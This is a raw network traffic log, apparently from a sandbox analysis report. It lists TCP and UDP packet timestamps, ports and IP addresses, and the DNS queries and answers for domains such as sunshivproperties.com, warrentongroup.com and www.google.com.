Apr 16, 2024 14:21:16.472140074 CEST	443	49743	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:16.480139971 CEST	443	49742	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:16.594815969 CEST	443	49742	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:16.594902992 CEST	443	49742	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:16.595012903 CEST	49742	443	192.168.2.4	23.220.189.216
Apr 16, 2024 14:21:16.595033884 CEST	443	49742	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:16.595050097 CEST	49742	443	192.168.2.4	23.220.189.216
Apr 16, 2024 14:21:16.595050097 CEST	49742	443	192.168.2.4	23.220.189.216
Apr 16, 2024 14:21:16.595057011 CEST	443	49742	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:16.595062017 CEST	443	49742	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:16.623478889 CEST	49744	443	192.168.2.4	23.220.189.216
Apr 16, 2024 14:21:16.623503923 CEST	443	49744	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:16.624022961 CEST	49744	443	192.168.2.4	23.220.189.216
Apr 16, 2024 14:21:16.624022961 CEST	49744	443	192.168.2.4	23.220.189.216
Apr 16, 2024 14:21:16.624047041 CEST	443	49744	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:16.693422079 CEST	443	49743	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:16.693749905 CEST	49743	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:16.693782091 CEST	443	49743	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:16.695223093 CEST	443	49743	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:16.695290089 CEST	49743	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:16.799896955 CEST	49743	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:16.800117016 CEST	443	49743	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:16.800137997 CEST	49743	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:16.837582111 CEST	443	49744	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:16.837661028 CEST	49744	443	192.168.2.4	23.220.189.216
Apr 16, 2024 14:21:16.838929892 CEST	49744	443	192.168.2.4	23.220.189.216
Apr 16, 2024 14:21:16.838937044 CEST	443	49744	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:16.839413881 CEST	443	49744	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:16.840431929 CEST	49744	443	192.168.2.4	23.220.189.216
Apr 16, 2024 14:21:16.843467951 CEST	49743	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:16.843482018 CEST	443	49743	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:16.888123035 CEST	443	49744	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:16.889576912 CEST	49743	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:16.932423115 CEST	443	49743	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:16.932508945 CEST	443	49743	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:16.932555914 CEST	49743	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:16.933305979 CEST	49743	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:16.933327913 CEST	443	49743	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:16.935395956 CEST	49745	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:16.935441017 CEST	443	49745	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:16.935522079 CEST	49745	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:16.936338902 CEST	49745	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:16.936376095 CEST	443	49745	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:17.046847105 CEST	443	49744	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:17.046940088 CEST	443	49744	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:17.046988964 CEST	49744	443	192.168.2.4	23.220.189.216
Apr 16, 2024 14:21:17.048180103 CEST	49744	443	192.168.2.4	23.220.189.216
Apr 16, 2024 14:21:17.048192024 CEST	443	49744	23.220.189.216	192.168.2.4
Apr 16, 2024 14:21:17.150805950 CEST	443	49745	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:17.151705980 CEST	49745	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:17.151771069 CEST	443	49745	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:17.152301073 CEST	443	49745	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:17.152842045 CEST	49745	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:17.152930975 CEST	443	49745	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:17.153223991 CEST	49745	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:17.200119019 CEST	443	49745	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:17.392283916 CEST	443	49745	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:17.392364025 CEST	443	49745	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:17.392584085 CEST	49745	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:17.418884993 CEST	49745	443	192.168.2.4	35.190.80.1
Apr 16, 2024 14:21:17.418945074 CEST	443	49745	35.190.80.1	192.168.2.4
Apr 16, 2024 14:21:19.166003942 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.166088104 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.166223049 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.166379929 CEST	49747	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.166424990 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.166475058 CEST	49747	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.166645050 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.166678905 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.166826963 CEST	49747	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.166842937 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.494365931 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.494642019 CEST	49747	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.494698048 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.496268034 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.496340990 CEST	49747	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.497283936 CEST	49747	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.497374058 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.497490883 CEST	49747	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.497505903 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.499943972 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.500152111 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.500193119 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.501859903 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.501920938 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.502687931 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.502778053 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.541665077 CEST	49747	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.547089100 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.547111988 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.593930006 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.808326006 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.808398962 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.808471918 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.808475971 CEST	49747	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.808536053 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.808551073 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.808609009 CEST	49747	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.809278965 CEST	49747	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.809314966 CEST	443	49747	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.828332901 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.876138926 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.997876883 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.997946978 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.998019934 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.998039007 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.998061895 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:19.998090029 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:19.998106956 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.046755075 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.151822090 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.151855946 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.151913881 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.151931047 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.151987076 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.151988983 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.152008057 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.152008057 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.152028084 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.152040005 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.152055025 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.152067900 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.152127981 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.152220964 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.152240992 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.152282000 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.152303934 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.305766106 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.305870056 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.305879116 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.305912018 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.305947065 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.305967093 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.306018114 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.306086063 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.306123972 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.306190968 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.306246996 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.306324005 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.306337118 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.306401014 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.459470034 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.459542036 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.459582090 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.459599018 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.459614992 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.459616899 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.459665060 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.459676027 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.459728003 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.459739923 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.459794998 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.459805012 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.459851027 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.459861040 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.459912062 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.459923983 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.459980965 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.459995031 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.460045099 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.460055113 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.460084915 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.460146904 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.460669994 CEST	49746	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.460686922 CEST	443	49746	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.603095055 CEST	49748	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.603185892 CEST	443	49748	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.603282928 CEST	49748	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.603477001 CEST	49748	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.603512049 CEST	443	49748	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.920911074 CEST	443	49748	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.966048956 CEST	49748	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.973845005 CEST	49748	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.973876953 CEST	443	49748	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.975339890 CEST	443	49748	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.976061106 CEST	49748	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.976223946 CEST	49748	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:20.976236105 CEST	443	49748	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:20.976281881 CEST	443	49748	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:21.017014027 CEST	49748	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:21.730336905 CEST	443	49748	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:21.754467010 CEST	443	49748	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:21.754718065 CEST	49748	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:21.905881882 CEST	49748	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:21.905919075 CEST	443	49748	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:23.369363070 CEST	49750	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:23.369467020 CEST	443	49750	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:23.369538069 CEST	49750	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:23.369920015 CEST	49750	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:23.369955063 CEST	443	49750	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:23.686559916 CEST	443	49750	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:23.710092068 CEST	49750	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:23.710155964 CEST	443	49750	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:23.713829994 CEST	443	49750	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:23.713905096 CEST	49750	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:23.715923071 CEST	49750	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:23.716125965 CEST	443	49750	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:23.716629028 CEST	49750	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:23.716646910 CEST	443	49750	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:23.764692068 CEST	49750	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.005352020 CEST	443	49750	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.005539894 CEST	443	49750	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.005604029 CEST	49750	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.007316113 CEST	49750	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.007358074 CEST	443	49750	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.161041975 CEST	49751	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.161127090 CEST	443	49751	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.161196947 CEST	49751	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.161874056 CEST	49751	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.161909103 CEST	443	49751	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.481228113 CEST	443	49751	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.481538057 CEST	49751	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.481600046 CEST	443	49751	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.485194921 CEST	443	49751	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.485301018 CEST	49751	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.485709906 CEST	49751	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.485709906 CEST	49751	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.485799074 CEST	443	49751	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.529233932 CEST	49751	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.529289961 CEST	443	49751	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.584350109 CEST	49751	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.795017004 CEST	443	49751	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.795203924 CEST	443	49751	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.796474934 CEST	49751	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.798698902 CEST	49751	443	192.168.2.4	142.4.12.244
Apr 16, 2024 14:21:24.798741102 CEST	443	49751	142.4.12.244	192.168.2.4
Apr 16, 2024 14:21:24.887548923 CEST	443	49739	64.233.177.103	192.168.2.4
Apr 16, 2024 14:21:24.887712002 CEST	443	49739	64.233.177.103	192.168.2.4
Apr 16, 2024 14:21:24.887933969 CEST	49739	443	192.168.2.4	64.233.177.103
Apr 16, 2024 14:21:25.303009987 CEST	49739	443	192.168.2.4	64.233.177.103
Apr 16, 2024 14:21:25.303042889 CEST	443	49739	64.233.177.103	192.168.2.4
Apr 16, 2024 14:21:25.383485079 CEST	49672	443	192.168.2.4	173.222.162.32
Apr 16, 2024 14:21:25.383533001 CEST	443	49672	173.222.162.32	192.168.2.4
Apr 16, 2024 14:22:14.491081953 CEST	49760	443	192.168.2.4	64.233.177.103
Apr 16, 2024 14:22:14.491173029 CEST	443	49760	64.233.177.103	192.168.2.4
Apr 16, 2024 14:22:14.491624117 CEST	49760	443	192.168.2.4	64.233.177.103
Apr 16, 2024 14:22:14.491624117 CEST	49760	443	192.168.2.4	64.233.177.103
Apr 16, 2024 14:22:14.491712093 CEST	443	49760	64.233.177.103	192.168.2.4
Apr 16, 2024 14:22:14.712836981 CEST	443	49760	64.233.177.103	192.168.2.4
Apr 16, 2024 14:22:14.713395119 CEST	49760	443	192.168.2.4	64.233.177.103
Apr 16, 2024 14:22:14.713465929 CEST	443	49760	64.233.177.103	192.168.2.4
Apr 16, 2024 14:22:14.714934111 CEST	443	49760	64.233.177.103	192.168.2.4
Apr 16, 2024 14:22:14.719357967 CEST	49760	443	192.168.2.4	64.233.177.103
Apr 16, 2024 14:22:14.719459057 CEST	443	49760	64.233.177.103	192.168.2.4
Apr 16, 2024 14:22:14.764049053 CEST	49760	443	192.168.2.4	64.233.177.103
Apr 16, 2024 14:22:22.172686100 CEST	49723	80	192.168.2.4	72.21.81.240
Apr 16, 2024 14:22:22.173001051 CEST	49724	80	192.168.2.4	72.21.81.240
Apr 16, 2024 14:22:22.276676893 CEST	80	49723	72.21.81.240	192.168.2.4
Apr 16, 2024 14:22:22.276726961 CEST	80	49724	72.21.81.240	192.168.2.4
Apr 16, 2024 14:22:22.276738882 CEST	49723	80	192.168.2.4	72.21.81.240
Apr 16, 2024 14:22:22.276849031 CEST	49724	80	192.168.2.4	72.21.81.240
Apr 16, 2024 14:22:24.718072891 CEST	443	49760	64.233.177.103	192.168.2.4
Apr 16, 2024 14:22:24.718147993 CEST	443	49760	64.233.177.103	192.168.2.4
Apr 16, 2024 14:22:24.718377113 CEST	49760	443	192.168.2.4	64.233.177.103
Apr 16, 2024 14:22:25.234668016 CEST	49760	443	192.168.2.4	64.233.177.103
Apr 16, 2024 14:22:25.234738111 CEST	443	49760	64.233.177.103	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 16, 2024 14:21:10.990262032 CEST	53	57326	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:11.160855055 CEST	53	62606	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:11.746310949 CEST	53	59348	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:12.323050976 CEST	61483	53	192.168.2.4	1.1.1.1
Apr 16, 2024 14:21:12.323383093 CEST	56318	53	192.168.2.4	1.1.1.1
Apr 16, 2024 14:21:12.447506905 CEST	53	61483	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:12.463984966 CEST	53	56318	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:14.436198950 CEST	59904	53	192.168.2.4	1.1.1.1
Apr 16, 2024 14:21:14.457284927 CEST	60093	53	192.168.2.4	1.1.1.1
Apr 16, 2024 14:21:14.541371107 CEST	53	59904	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:14.562237978 CEST	53	60093	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:15.154752016 CEST	53	53656	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:16.366132975 CEST	59989	53	192.168.2.4	1.1.1.1
Apr 16, 2024 14:21:16.366367102 CEST	58904	53	192.168.2.4	1.1.1.1
Apr 16, 2024 14:21:16.470525980 CEST	53	59989	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:16.470979929 CEST	53	58904	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:18.941721916 CEST	49862	53	192.168.2.4	1.1.1.1
Apr 16, 2024 14:21:18.942171097 CEST	59336	53	192.168.2.4	1.1.1.1
Apr 16, 2024 14:21:19.068312883 CEST	53	59336	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:19.165333033 CEST	53	49862	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:20.687213898 CEST	53	64617	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:23.234352112 CEST	54469	53	192.168.2.4	1.1.1.1
Apr 16, 2024 14:21:23.234730005 CEST	59378	53	192.168.2.4	1.1.1.1
Apr 16, 2024 14:21:23.346333981 CEST	53	59378	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:23.368633986 CEST	53	54469	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:24.044584036 CEST	62352	53	192.168.2.4	1.1.1.1
Apr 16, 2024 14:21:24.044987917 CEST	49273	53	192.168.2.4	1.1.1.1
Apr 16, 2024 14:21:24.159950018 CEST	53	62352	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:24.160273075 CEST	53	49273	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:29.213921070 CEST	53	58432	1.1.1.1	192.168.2.4
Apr 16, 2024 14:21:33.694360018 CEST	138	138	192.168.2.4	192.168.2.255
Apr 16, 2024 14:21:48.212625027 CEST	53	49286	1.1.1.1	192.168.2.4
Apr 16, 2024 14:22:10.340684891 CEST	53	55377	1.1.1.1	192.168.2.4
Apr 16, 2024 14:22:10.682538986 CEST	53	50718	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 16, 2024 14:21:12.323050976 CEST	192.168.2.4	1.1.1.1	0x7c74	Standard query (0)	sunshivproperties.com	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:12.323383093 CEST	192.168.2.4	1.1.1.1	0x506	Standard query (0)	sunshivproperties.com	65	IN (0x0001)	false
Apr 16, 2024 14:21:14.436198950 CEST	192.168.2.4	1.1.1.1	0xd6a7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:14.457284927 CEST	192.168.2.4	1.1.1.1	0x5dc2	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 16, 2024 14:21:16.366132975 CEST	192.168.2.4	1.1.1.1	0xeb4c	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:16.366367102 CEST	192.168.2.4	1.1.1.1	0xcc5e	Standard query (0)	a.nel.cloudflare.com	65	IN (0x0001)	false
Apr 16, 2024 14:21:18.941721916 CEST	192.168.2.4	1.1.1.1	0x314e	Standard query (0)	warrentongroup.com	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:18.942171097 CEST	192.168.2.4	1.1.1.1	0x237b	Standard query (0)	warrentongroup.com	65	IN (0x0001)	false
Apr 16, 2024 14:21:23.234352112 CEST	192.168.2.4	1.1.1.1	0x7793	Standard query (0)	www.warrentongroup.com	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:23.234730005 CEST	192.168.2.4	1.1.1.1	0xe1a7	Standard query (0)	www.warrentongroup.com	65	IN (0x0001)	false
Apr 16, 2024 14:21:24.044584036 CEST	192.168.2.4	1.1.1.1	0x75d3	Standard query (0)	www.warrentongroup.com	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:24.044987917 CEST	192.168.2.4	1.1.1.1	0xf034	Standard query (0)	www.warrentongroup.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 16, 2024 14:21:12.447506905 CEST	1.1.1.1	192.168.2.4	0x7c74	No error (0)	sunshivproperties.com		104.21.54.147	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:12.447506905 CEST	1.1.1.1	192.168.2.4	0x7c74	No error (0)	sunshivproperties.com		172.67.139.104	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:12.463984966 CEST	1.1.1.1	192.168.2.4	0x506	No error (0)	sunshivproperties.com			65	IN (0x0001)	false
Apr 16, 2024 14:21:14.541371107 CEST	1.1.1.1	192.168.2.4	0xd6a7	No error (0)	www.google.com		64.233.177.103	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:14.541371107 CEST	1.1.1.1	192.168.2.4	0xd6a7	No error (0)	www.google.com		64.233.177.105	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:14.541371107 CEST	1.1.1.1	192.168.2.4	0xd6a7	No error (0)	www.google.com		64.233.177.106	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:14.541371107 CEST	1.1.1.1	192.168.2.4	0xd6a7	No error (0)	www.google.com		64.233.177.99	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:14.541371107 CEST	1.1.1.1	192.168.2.4	0xd6a7	No error (0)	www.google.com		64.233.177.147	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:14.541371107 CEST	1.1.1.1	192.168.2.4	0xd6a7	No error (0)	www.google.com		64.233.177.104	A (IP address)	IN (0x0001)	false
Apr 16, 2024 14:21:14.562237978 CEST	1.1.1.1	192.168.2.4	0x5dc2	No error (0)	www.google.com			65	IN (0x0001)	false
